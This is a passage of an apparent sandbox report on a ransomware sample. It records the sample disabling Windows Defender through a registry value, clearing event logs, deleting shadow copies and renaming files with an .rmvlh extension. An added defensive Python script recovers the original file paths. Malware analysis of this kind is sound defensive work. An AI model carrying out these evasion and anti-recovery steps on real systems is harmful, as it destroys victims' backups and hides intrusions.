memory/520-116-0x0000000000000000-mapping.dmp

memory/280-117-0x0000000000000000-mapping.dmp

memory/1444-118-0x0000000075CE1000-0x0000000075CE3000-memory.dmp

memory/1444-119-0x00000000024A0000-0x00000000030EA000-memory.dmp

memory/1444-120-0x00000000024A0000-0x00000000030EA000-memory.dmp

memory/1444-121-0x00000000024A0000-0x00000000030EA000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

MD5 30d83649de7ecd51dbbfcca01a5ead2e
SHA1 bd3270bca38851ccb82d91ffc3bc4466d21a8962
SHA256 8945229a0291fc15b6a92e26991c1b8820886b041e433bc102764d5d8d2bcfb1
SHA512 41fdb29361d5f30f0a29dac871539738b8984f5b090b422471a58a3e9fe9b1b1c571885ac09167d7133f7f3e4f6191a9df5fd4b15128c3bee372a28d0c91f2e5

Analysis: behavioral2

Detonation Overview

Submitted

2022-01-13 11:09

Reported

2022-01-13 11:15

Platform

win10-en-20211208

Max time kernel

110s

Max time network

153s

Command Line

"C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe"

Signatures

Deletes Windows Defender Definitions

evasion
Description Indicator Process Target
N/A N/A C:\Program Files\Windows Defender\MpCmdRun.exe N/A

Modifies Windows Defender Real-time Protection settings

evasion trojan

Modifies security service

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" C:\Windows\SysWOW64\reg.exe N/A

Clears Windows event logs

evasion ransomware

Deletes shadow copies

ransomware

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\deploy\messages_fr.properties.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_BfcFJ60wSfE0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.w3c.dom.svg_1.1.0.v201011041433.jar.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_XB5kDCSpuh00.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\update_tracking\org-netbeans-modules-keyring-impl.xml.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_SHD8Ga0cK1A0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\update_tracking\org-openide-loaders.xml.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_iUcjNoPdyeE0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Common Files\System\ado\msador28.tlb C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Common Files\microsoft shared\ink\zh-CN\tipresx.dll.mui C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.engine.nl_zh_4.4.0.v20140623020002.jar.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_Z0kzsJ1HtO40.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\MondoR_OEM_Perp-ul-oob.xrm-ms.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_urqyWfJBd0E0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\include\jni.h.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_VpeGcDRx_600.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Common Files\System\Ole DB\ja-JP\sqlxmlx.rll.mui.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_xBqcQlci4kU0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.browser.jdp.ja_5.5.0.165303.jar.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_fhU_Z6zugZM0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Microsoft Office\PackageManifests\AppXManifest.90160000-3101-0000-1000-0000000FF1CE.xml.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_VNw5g3Qbr1U0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\MondoR_Retail-pl.xrm-ms.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_UMSBdz8Ts9k0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Common Files\System\Ole DB\es-ES\oledb32r.dll.mui C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioStdR_Retail-ul-phn.xrm-ms.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_wQN5AI0iNYw0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Java\jre1.8.0_66\Welcome.html.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_pPwk5yAlVgA0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365HomePremR_SubTest3-ul-oob.xrm-ms.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_gO-pvtuqATU0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Common Files\microsoft shared\MSInfo\fr-FR\msinfo32.exe.mui.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_gdwyXg3xypw0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\main\base_altgr.xml C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\META-INF\MANIFEST.MF.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_hN28bvevx-M0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\com.jrockit.mc.rjmx.attributeTransformation.exsd.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_EWoFHzeUDqE0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ExcelR_Retail-pl.xrm-ms.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_7hiRmaQnIQA0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectStd2019VL_KMS_Client_AE-ul-oob.xrm-ms.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_-Ir3_eeKWB40.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-openide-loaders_zh_CN.jar.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_D3N2gOcL0mQ0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-jvmstat.jar.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_92oFVzAOjao0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ExcelVL_KMS_Client-ul-oob.xrm-ms.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_X-BDUvRup240.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\OneNoteR_OEM_Perp-ppd.xrm-ms.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_mtM1aX1OgJc0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Common Files\System\Ole DB\es-ES\sqloledb.rll.mui C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Common Files\System\msadc\es-ES\msdaremr.dll.mui C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\p2\org.eclipse.equinox.p2.core\cache\binary\com.jrockit.mc.rcp.product_root_5.5.0.165303.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_jCbFDIbA3Og0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\update_tracking\org-netbeans-swing-tabcontrol.xml.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_4dQJGfwtA7I0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\PowerPointR_Grace-ul-oob.xrm-ms.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_bGzC-_3gzRQ0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectProCO365R_Subscription-pl.xrm-ms.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_UNjpLQN5E9A0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\jfxswt.jar.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_XK87vMmqKwc0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectPro2019VL_MAK_AE-pl.xrm-ms.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_YyhcRbDQLPI0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-modules-appui.xml.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_D6LiYSJy_580.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\deploy\messages_fr.properties.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_fEkoqdYFmNM0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Excel2019VL_MAK_AE-ul-phn.xrm-ms.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_qY450fw5BSo0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\7-Zip\descript.ion.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_CVb6LtUXU5Y0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Professional2019R_OEM_Perp-ul-phn.xrm-ms.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_dfWez84sGvw0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\deploy\messages_zh_CN.properties.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_GXY1VYBujJ00.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\PowerPointR_Retail-ppd.xrm-ms.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_cmr1HdkCTPE0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301\feature.xml.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_xlnSAD8vFOM0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Common Files\microsoft shared\Stationery\Garden.htm C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Common Files\microsoft shared\ink\de-DE\IPSEventLogMsg.dll.mui C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\jfr\profile.jfc.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_Gb2tZdhSuaI0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Excel2019R_OEM_Perp-ul-phn.xrm-ms.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_MUCqyzXav_k0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365HomePremR_SubTrial4-ppd.xrm-ms.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_HRWaX3r8utk0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Common Files\System\msadc\ja-JP\msdaremr.dll.mui C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-application-views.xml.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_rzyYxO7H7VA0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProPlusR_Trial-ppd.xrm-ms.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_FL_9_8wZ6zU0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Common Files\System\Ole DB\en-US\oledb32r.dll.mui C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\pkeyconfig-office-client15.xrm-ms.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_zPnEz3aOdsA0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\ExitGroup.eprtx.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_879Ncg2tbk00.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioProO365R_SubTrial-ul-oob.xrm-ms.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_JBJ1ySAXUc40.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\AccessR_Grace-ul-oob.xrm-ms.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_tLcEOpc0HzE0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\OutlookR_OEM_Perp-pl.xrm-ms.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_dJglFczl9640.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Common Files\System\Ole DB\fr-FR\oledb32r.dll.mui.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_AsXRmUtmEtA0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\include\jvmti.h.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_wW-RskY7mRg0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-openide-execution.jar.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_9bBxLSh4Xmw0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365ProPlusR_Subscription5-ul-oob.xrm-ms.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_WFkHCgwaei40.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioProR_Retail2-pl.xrm-ms.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_zwhtPkcdlF40.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\an.txt.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_532CRsP1Vac0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Common Files\System\Ole DB\fr-FR\sqloledb.rll.mui.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_F22779o8nzs0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
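
Every renamed file in the table above follows one pattern: the original name, a dot, a 43-character token that is identical for every file in this detonation, an underscore, a 12-character per-file token, and the extension .rmvlh. Entries such as msador28.tlb and tipresx.dll.mui that were only opened for modification appear with their original names. The Python below is an added example by the editor, not part of the report and not the sample's code; it recovers original paths from that pattern and separates renamed from untouched entries, which is the first step when triaging a file list from an infected host. The token alphabet (base64url-style), the fixed lengths and the assumption that the 43-character part stays constant are read off this table only and would need re-checking on another sample; the meaning of the tokens is not stated by the report and is not guessed here. The paths in SAMPLE_PATHS are copied from the table.

```python
"""Recover original paths from the renamed files listed in the table above.

Added example, not part of the sandbox report and not the sample's code.
Pattern, token lengths and alphabet are read off this report's file list
only: <original name>.<43-char shared token>_<12-char per-file token>.rmvlh
"""
import re
from collections import Counter
from pathlib import PureWindowsPath

# Assumption from the listed names: tokens use a base64url-style alphabet and
# have fixed lengths.  Anchoring on the end makes the split unambiguous even
# when the original name itself contains dots or underscores
# (messages_fr.properties, descript.ion) or the per-file token contains '_'.
ENCRYPTED_NAME_RE = re.compile(
    r"^(?P<original>.+)\.(?P<shared>[A-Za-z0-9_-]{43})_(?P<per_file>[A-Za-z0-9_-]{12})\.rmvlh$")


def parse_encrypted_name(path):
    """(original_path, shared_token, per_file_token) for a renamed file, or None.

    None covers entries the sample only opened for modification and had not
    renamed; they sit in the same table under their original names."""
    p = PureWindowsPath(path)
    m = ENCRYPTED_NAME_RE.match(p.name)
    if m is None:
        return None
    return str(p.with_name(m["original"])), m["shared"], m["per_file"]


def triage(paths):
    """Split a file list into renamed/untouched, collect the set of shared
    tokens (a single value confirms the 43-char part really is constant), and
    count renamed files per program folder, i.e. the third path component
    ('Java' in C:\\Program Files\\Java\\...); files directly under
    C:\\Program Files are counted as '(top level)'."""
    renamed, untouched, shared, per_folder = [], [], set(), Counter()
    for path in paths:
        parsed = parse_encrypted_name(path)
        if parsed is None:
            untouched.append(path)
            continue
        original, shared_token, _per_file = parsed
        renamed.append(original)
        shared.add(shared_token)
        parts = PureWindowsPath(original).parts   # ('C:\\', 'Program Files', 'Java', ...)
        per_folder[parts[2] if len(parts) > 3 else "(top level)"] += 1
    return {"renamed": renamed, "untouched": untouched,
            "shared_tokens": shared, "per_folder": dict(per_folder)}


# Copied from the "Drops file in Program Files directory" table above.
SAMPLE_PATHS = [
    r"C:\Program Files\Java\jdk1.8.0_66\jre\lib\deploy\messages_fr.properties.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_BfcFJ60wSfE0.rmvlh",
    r"C:\Program Files\Common Files\System\ado\msador28.tlb",
    r"C:\Program Files\Microsoft Office\root\Licenses16\MondoR_OEM_Perp-ul-oob.xrm-ms.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_urqyWfJBd0E0.rmvlh",
    r"C:\Program Files\7-Zip\descript.ion.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_CVb6LtUXU5Y0.rmvlh",
    r"C:\Program Files\ExitGroup.eprtx.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_879Ncg2tbk00.rmvlh",
    r"C:\Program Files\Microsoft Office\root\Licenses16\ProjectStd2019VL_KMS_Client_AE-ul-oob.xrm-ms.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_-Ir3_eeKWB40.rmvlh",
]

if __name__ == "__main__":
    result = triage(SAMPLE_PATHS)
    for original in result["renamed"]:
        print("renamed  ", original)
    for path in result["untouched"]:
        print("untouched", path)
    print("shared tokens:", result["shared_tokens"])
    print("per folder:", result["per_folder"])
```

On a real host the input would be a directory walk or a file-system timeline rather than a sandbox table; the untouched list is then worth a second look, because a file the sample opened for modification but did not rename may still have been partly overwritten.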

Launches sc.exe

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\vssadmin.exe N/A

Modifies registry class

Description Indicator Process Target
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\ContextMenuHandlers\EPP C:\Windows\SysWOW64\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\EPP C:\Windows\SysWOW64\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\EPP C:\Windows\SysWOW64\reg.exe N/A

Runs net.exe

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\wevtutil.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
